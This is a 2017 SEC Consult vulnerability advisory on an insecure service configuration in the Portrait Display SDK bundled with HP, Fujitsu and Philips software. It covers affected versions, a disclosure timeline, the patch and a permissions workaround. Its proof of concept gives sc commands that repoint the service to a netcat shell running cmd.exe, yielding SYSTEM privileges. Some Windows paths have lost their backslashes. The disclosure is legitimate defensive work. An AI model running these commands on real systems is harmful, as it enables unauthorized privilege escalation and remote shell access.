SEC Consult Vulnerability Lab Security Advisory < 20170425-0 >
=========================& SEC Consult Vulnerability Lab Security Advisory < 20170425-0 >
=======================================================================
title: Privilege Escalation due to insecure service configuration
product: Portrait Display SDK Service
vulnerable version: mutliple, see PoC
fixed version: multiple, see solution
CVE number: CVE-2017-3210
impact: critical
homepage: http://www.portrait.com/
found: 2017-02-23
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"For nearly 20 years, Portrait Displays has provided customized software to
OEM monitor manufacturers across the globe. We develop tailored solutions,
encompassing the needs of todayas changing marketplace.

Our technologies allow OEMs to provide their end users with a premium
interactive experience. Our engineers work hand-in-hand with leading OEMS,
ODMs, and GPU and scaler companies, to develop and implement cutting-edge
software solutions."

Source: http://www.portrait.com/technology.html


Business recommendation:
------------------------
SEC Consult recommends not to use this service in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
The Portrait Display SDK Service (PdiService.exe) configuration was found to
be writable for every authenticated user in a default installation. This would
allow an attacker to execute arbitrary code, elevate his privileges and gain a
shell with the privileges of the SYSTEM user.

The Portrait Display SDK Service is used in various different OEM software,
which is shipped per default on a wide range of notebooks. The software, where
the SDK is included is used as an virtual OSD (On Screen Display) for "tuning"
displays, setting gamma values, changing color values etc.

The vulnerability was identified in the software "DisplayView Click" from
Fujitsu. Due to the fact, that this SDK is used in several software packages,
SEC Consult tried to identify other potential vulnerable software packages,
which got rebranded by Portrait Displays, Inc. The following list contains an
excerpt of packages containing the SDK, which are partially installed per
default on
notebooks of HP, Philips,Fujitsu, etc.


-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6
-) HP Display Assistant
-) HP Display Control
-) HP Mobile Display Assistant v1
-) HP Mobile Display Assistant v2
-) HP My Display
-) HP My Display All-In-One/TouchSmart
-) HP Picture in Picture
-) Philips SmartControl II
-) Philips SmartControl Lite
-) Philips SmartControl Premium


Portait Displays Inc. confirmed that at least the following packages are
vulnerable:

Fujitsu DisplayView Click
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01
build id: dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5
build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id:
dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1
build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22
and above

HP My Display Version 2.01
build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and
above

Philips Smart Control Premium
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

Furthermore, a more detailed summary of this advisory has been published at our
blog:
http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html

Proof of concept:
-----------------
To identify the permissions of the service the builtin Windows command "sc" was
used. The output of the command for the vulnerable service can be seen below:

(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
(A;;CCLCSWRPWPDTLOCRRC;;;SY)
(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)
(A;;CCLCSWLOCRRC;;;SU)

By "converting" the Security Descriptor Definition Language into human readable
words, SEC Consult was able to identify the following permissions for the
PdiService:

RW NT AUTHORITYAuthenticated Users
RW NT AUTHORITYSYSTEM
RW BUILTINAdministrators
R NT AUTHORITYINTERACTIVE
R NT AUTHORITYSERVICE

Due to the fact, that every authenticated user has write access on the service,
an attacker is able to execute arbitrary code by changing the services binary
path. Moreover, all Windows services are executed with SYSTEM permissions,
resulting in privilege escalation.

The workflow to execute arbitrary code is as follows:
1) Stop Service
sc stop pdiservice
2) Alter service binary path
sc config pdiservice binpath= "C: c.exe -nv 127.0.0.1 4242 -e
C:WINDOWSSystem32cmd.exe"
3) Start Service
sc start pdiservice


Vulnerable / tested versions:
-----------------------------
The following list contains all vulnerable versions:

Fujitsu DisplayView Click
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01
build id: dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5
build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id:
dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1
build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22
and above

HP My Display Version 2.01
build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and
above

Philips Smart Control Premium
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07


Vendor contact timeline:
------------------------
2017-03-01: Contacting vendor through email sales@portrait.com
2017-03-01: Informing CERT/CC, asking for coordination support regarding HW
vendors, assigned VU#219739
2017-03-01: The vendor responds and requests all attachments as plaintext in
the email body because they are not allowed to open any attachements
from "unknown parties".
Therefore SEC Consult sends the PGP Public Keys as plaintext in the
body of the email.
2017-03-08: Contacting vendor again on how to transmit the advisory; no answer
2017-03-15: Informing CERT/CC about the status, asking for support to contact
the vendor
2017-03-16: The Vendor provides a public key for encrypted communication;
The advisory got securely transmitted to the vendor.
2017-03-18: The vendor responds and confirms that they were able to reproduce
the vulnerability. Detailed information, on which Brands are
affected, as well as a timeline for an update will be provided next
week.
2017-03-28: Requesting update from Portrait Displays Inc. Asking about current
state and a list of affected vendors.
2017-03-29: Vendors responds that they are still in the process of evaluating
on, which 3rd parties are affected.
2017-04-06: Vendor updates us with information about the planed release schedule
and affected vendors. Portrait is still in the progress of
evaluating on, which3rd parties are affected. The list should be
available at the end of the week. A patch that removes the invalid
permission will be available on the vendors website.
2017-04-17: Vendor provides us with a detailed list of affected products.
2017-04-18: Vendor publicly releases a patch for the vulnerability on their
website (http://www.portrait.com/securityupdate.html)
2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the
disclosure of the CERT VU and the SEC Consult advisory.
2017-04-25: Public release.

Solution:
---------
Since the 18th of April 2017 a patch is available.
See: http://www.portrait.com/securityupdate.html

Workaround:
-----------
To quickly get rid of the vulnerability, the permissions of the service should
be altered with the built-in windows command "sc". To completely remove the
permissions of the "Authenticated Users" group, the following command can be
used:

sc sdset pdiservice
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

This will result in the following set of permissions:
RW NT AUTHORITYSYSTEM
RW BUILTINAdministrators
R NT AUTHORITYINTERACTIVE
R NT AUTHORITYSERVICE


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Schober / @2017